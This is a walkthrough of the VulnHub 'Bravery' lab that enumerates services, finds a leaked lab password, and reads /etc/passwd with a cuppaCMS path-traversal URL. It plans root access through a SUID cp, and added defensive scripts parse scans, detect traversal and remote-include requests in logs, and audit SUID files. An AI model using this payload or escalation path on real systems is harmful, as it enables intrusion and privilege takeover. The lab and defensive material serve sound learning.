you can download it here: https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/

use nmap to discover the target:

nmap -p 1-65535 -T4 -v 192.168.227.0/24


check its port 80


default apache 2.4 page, use dirb to scan for any sensitive files and directories


nothing much more to find here.

what I know so far: there is a CMS called cuppaCMS, installed in an unknown directory.

check its port 8080


didn’t gather much useful information.

had been stuck here for a very long time, so I decided to do a thorough port scan.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-07 00:11 EDT
Nmap scan report for 192.168.227.154
Host is up (0.00042s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 4d:8f:bc:01:49:75:83:00:65:a9:53:a9:75:c6:57:33 (RSA)
| 256 92:f7:04:e2:09:aa:d0:d7:e6:fd:21:67:1f:bd:64:ce (ECDSA)
|_ 256 fb:08:cd:e8:45:8c:1a:c1:06:1b:24:73:33:a5:e4:77 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/udp nfs
| 100005 1,2,3 20048/tcp mountd
| 100005 1,2,3 20048/udp mountd
| 100021 1,3,4 42062/tcp nlockmgr
| 100021 1,3,4 47637/udp nlockmgr
| 100024 1 47575/tcp status
| 100024 1 52096/udp status
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
|_http-title: Apache HTTP Server Test Page powered by CentOS
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2018-06-10T15:53:25
|_Not valid after: 2019-06-10T15:53:25
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.7.1 (workgroup: WORKGROUP)
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http nginx 1.12.2
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 4 disallowed entries
|_/cgi-bin/ /qwertyuiop.html /private /public
|_http-server-header: nginx/1.12.2
|_http-title: Welcome to Bravery! This is SPARTA!
MAC Address: 00:0C:29:38:6F:F8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: BRAVERY

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
|_nbstat: NetBIOS name: BRAVERY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.1)
| Computer name: localhost
| NetBIOS computer name: BRAVERY\x00
| Domain name: \x00
| FQDN: localhost
|_ System time: 2019-06-07T00:12:08-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2019-06-07 00:12:08
|_ start_date: N/A

TRACEROUTE
HOP RTT ADDRESS
1 0.42 ms 192.168.227.154

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.99 seconds
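A scan report like the one above is easier to triage when it is turned into structured data. The script below is an added example, not code from the original walkthrough: it parses nmap's normal output into ports with their attached NSE script lines and maps the items this host exposes (HTTP TRACE, NFS, a routable database, robots.txt entries, unsigned SMB) to the defensive follow-up each one needs. The embedded sample is a trimmed copy of the report above; the Apache and Samba settings named in the findings are real directives.

```python
"""Parse nmap -sV/-sC normal output into structured findings.

Added example, not code from the original walkthrough: it reads a scan report
like the one above, extracts each open port with the NSE script lines that
belong to it, and flags the items a defender would triage first.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed copy of the scan report shown in the post.
SAMPLE_SCAN = """\
Nmap scan report for 192.168.227.154
Host is up (0.00042s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
53/tcp open domain dnsmasq 2.76
80/tcp open http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Apache HTTP Server Test Page powered by CentOS
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.1 (workgroup: WORKGROUP)
2049/tcp open nfs_acl 3 (RPC #100227)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http nginx 1.12.2
| http-robots.txt: 4 disallowed entries
|_/cgi-bin/ /qwertyuiop.html /private /public
MAC Address: 00:0C:29:38:6F:F8 (VMware)

Host script results:
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

# "80/tcp open http Apache httpd 2.4.6 (...)" -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str
    scripts: list = field(default_factory=list)  # NSE output lines under this port


def parse_nmap(text):
    """Return (target, [Port, ...], host_script_lines) from nmap normal output."""
    target, ports, host_scripts = None, [], []
    in_host_section = False
    for raw in text.splitlines():
        line = raw.strip()
        m = PORT_RE.match(line)
        if line.startswith("Nmap scan report for"):
            target = line.split()[-1]
        elif line.startswith("Host script results"):
            in_host_section = True
        elif m:
            ports.append(Port(int(m[1]), m[2], m[3], m[4], m[5]))
        elif line.startswith("|") and (in_host_section or ports):
            body = line.lstrip("|_ ")  # strip the NSE tree prefix
            (host_scripts if in_host_section else ports[-1].scripts).append(body)
    return target, ports, host_scripts


def risk_findings(ports, host_scripts):
    """Map the scan to the defensive follow-ups this host needs."""
    findings = []
    for p in ports:
        if p.state != "open":
            continue
        if p.service in ("nfs", "nfs_acl", "mountd"):
            findings.append(f"{p.number}/{p.proto}: NFS reachable from the LAN; review /etc/exports and restrict clients")
        if p.service == "mysql":
            findings.append(f"{p.number}/{p.proto}: MariaDB on a routable address; bind it to 127.0.0.1 unless needed")
        for s in p.scripts:
            if "Potentially risky methods" in s and "TRACE" in s:
                findings.append(f"{p.number}/{p.proto}: HTTP TRACE enabled; set 'TraceEnable off' in httpd.conf")
            if s.startswith("http-robots.txt"):
                findings.append(f"{p.number}/{p.proto}: robots.txt advertises paths; treat them as public, not hidden")
    for s in host_scripts:
        if s.startswith("message_signing: disabled"):
            findings.append("SMB: signing disabled; set 'server signing = mandatory' in smb.conf")
    return findings


if __name__ == "__main__":
    target, ports, host_scripts = parse_nmap(SAMPLE_SCAN)
    print(f"{target}: {len(ports)} open ports")
    for f in risk_findings(ports, host_scripts):
        print(" -", f)
```

Feed it a saved `-oN` file instead of the sample to use it on your own scans; `-oX` plus an XML parser is the more robust route for anything beyond a quick triage, but the normal-output format is what most people have lying around.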

SMB share (port 445) is enabled and NFS (2049) is enabled; let's see if I can mount the drive locally.


seems nothing special; the file qwertyuioplkjhgfdsazxcvbnm looks suspicious.

check smb share


david's password seems to have been leaked; that's why he is asking others not to spread the password around.

tried to access secret folder, and finally got in using username david and password qwertyuioplkjhgfdsazxcvbnm


get three urls: /devops/directortestpagev1.php, /developmentsecretpage and /genevieve

tried to access the three urls and succeeded with /genevieve

and found this: http://192.168.227.154/genevieve/cuppaCMS/index.php

so this is the cuppaCMS I was looking for.

googled cuppaCMS for available vulnerabilities and found this: https://www.exploit-db.com/exploits/25971

file inclusion leads to RCE

http://192.168.227.154/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
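From the defender's side, a request like the one above leaves a very recognisable trace in the web server's access log. The script below is an added example, not part of the original walkthrough: it parses combined-format log lines, fully URL-decodes each query parameter (so double-encoded `%252F` is caught as well), and tags values that look like path traversal, reads of sensitive files, or inclusion of a remote URL. The log lines are constructed and modelled on the cuppaCMS request above; the client addresses, timestamps and user agents are made up.

```python
"""Spot file-inclusion attempts in Apache/nginx access logs.

Added example, not part of the original walkthrough: it decodes each query
parameter, then tags values that look like path traversal, reads of
sensitive files, or inclusion of a remote URL. The log lines are constructed
(combined log format) and modelled on the cuppaCMS request in the post.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
10.0.0.5 - - [07/Jun/2019:00:20:11 -0400] "GET /genevieve/cuppaCMS/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jun/2019:00:21:03 -0400] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd HTTP/1.1" 200 1847 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jun/2019:00:21:40 -0400] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1847 "-" "Mozilla/5.0"
10.0.0.5 - - [07/Jun/2019:00:22:15 -0400] "GET /genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=http://10.0.0.5/x.txt HTTP/1.1" 200 93 "-" "curl/7.64.0"
10.0.0.7 - - [07/Jun/2019:00:25:00 -0400] "GET /index.html?page=home HTTP/1.1" 200 4891 "-" "Mozilla/5.0"
"""

# Combined log format: client, ident, user, [time], "request", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
TRAVERSAL = re.compile(r"(\.\./|\.\.\\){2,}")          # two or more ../ (or ..\) hops
SENSITIVE = re.compile(r"/etc/(passwd|shadow)\b|/proc/self/", re.I)
REMOTE_INCLUDE = re.compile(r"^(https?|ftp|php|data)://", re.I)


def decode_fully(value, max_rounds=3):
    """URL-decode until the value stops changing, so %252E%252E%252F is seen as ../ too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(path):
    """Return tags such as 'traversal:urlConfig' for each suspicious parameter."""
    if "?" not in path:
        return []
    tags = []
    for param in path.split("?", 1)[1].split("&"):
        name, _, value = param.partition("=")
        value = decode_fully(value)
        if TRAVERSAL.search(value):
            tags.append(f"traversal:{name}")
        if SENSITIVE.search(value):
            tags.append(f"sensitive-file:{name}")
        if REMOTE_INCLUDE.match(value):
            tags.append(f"remote-include:{name}")
    return tags


def scan_log(text):
    """Return one hit per suspicious request; a 2xx status means it likely succeeded."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m["path"])
        if tags:
            hits.append({
                "ip": m["ip"],
                "time": m["ts"],
                "path": m["path"],
                "status": int(m["status"]),
                "tags": tags,
                "likely_success": m["status"].startswith("2"),
            })
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(h["time"], h["ip"], h["status"], ",".join(h["tags"]), h["path"])
```

The response status is the important second signal: a traversal request answered with 200 and a body size that matches the size of /etc/passwd is a hit to escalate, while a 404 or 403 is a probe to watch. The same patterns run unchanged against a WAF or reverse-proxy log as long as the query string survives.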



ok, now I have a webshell.

get a reverse shell, and make it interactive.


look for SUID files to escalate privilege

find / -user root -perm -4000 -print 2>/dev/null


check cp


seems like it allows me to overwrite anything.

I can add one more line (one more user) to /etc/passwd and get root.
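A SUID cp is exactly the kind of thing a periodic audit should catch before anyone else does. The script below is an added example, not part of the original walkthrough: it walks the filesystem for set-uid/set-gid regular files (the same thing the `find` above does, without following symlinks or descending into /proc and friends) and reports root-owned SUID binaries that are not on a known-good baseline. The baseline set here is a constructed, illustrative subset for a CentOS 7 style host; a real one should be generated from a clean image of the same build and kept outside the host being checked.

```python
"""Audit SUID binaries against a known-good baseline.

Added example, not part of the original walkthrough. collect_suid() gathers
every set-uid/set-gid regular file (skipping pseudo filesystems), and audit()
reports root-owned SUID binaries that are not in the baseline. BASELINE is a
constructed subset for a CentOS 7 style host, not an authoritative list.
"""
import os
import stat
import tempfile

BASELINE = {
    "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/chsh", "/usr/bin/chage", "/usr/bin/gpasswd",
    "/usr/bin/newgrp", "/usr/bin/pkexec", "/usr/sbin/unix_chkpwd",
}
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")


def collect_suid(root="/"):
    """Return (path, mode, uid) for every regular file with SUID or SGID set."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root):
        # prune pseudo filesystems in place so os.walk does not descend into them
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append((path, st.st_mode, st.st_uid))
    return sorted(found)


def audit(entries, baseline=BASELINE):
    """Root-owned SUID files that are not in the baseline, sorted by path."""
    unexpected = []
    for path, mode, uid in entries:
        if uid == 0 and mode & stat.S_ISUID and path not in baseline:
            unexpected.append(path)
    return sorted(unexpected)


def demo_on_tempdir():
    """Set the SUID bit on a scratch file and confirm collect_suid() sees it.

    Returns True when found, None if the filesystem refused to keep the bit.
    """
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "scratch")
        with open(path, "w") as fh:
            fh.write("x")
        os.chmod(path, 0o4755)
        if not os.stat(path).st_mode & stat.S_ISUID:
            return None
        return path in [p for p, _, _ in collect_suid(d)]


if __name__ == "__main__":
    # On a live host, run as root so every directory is readable.
    for path in audit(collect_suid("/")):
        print("unexpected SUID binary:", path)
```

Anything this reports, such as a general-purpose file tool like cp, should be treated as a root-equivalent finding: a SUID copy program lets any local user write any file as root, which is exactly how /etc/passwd gets an extra line in the step above. Pair the audit with file-integrity monitoring on /etc/passwd, /etc/shadow and /etc/sudoers so the write itself also raises an alert.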


PS: this is probably the hardest one so far.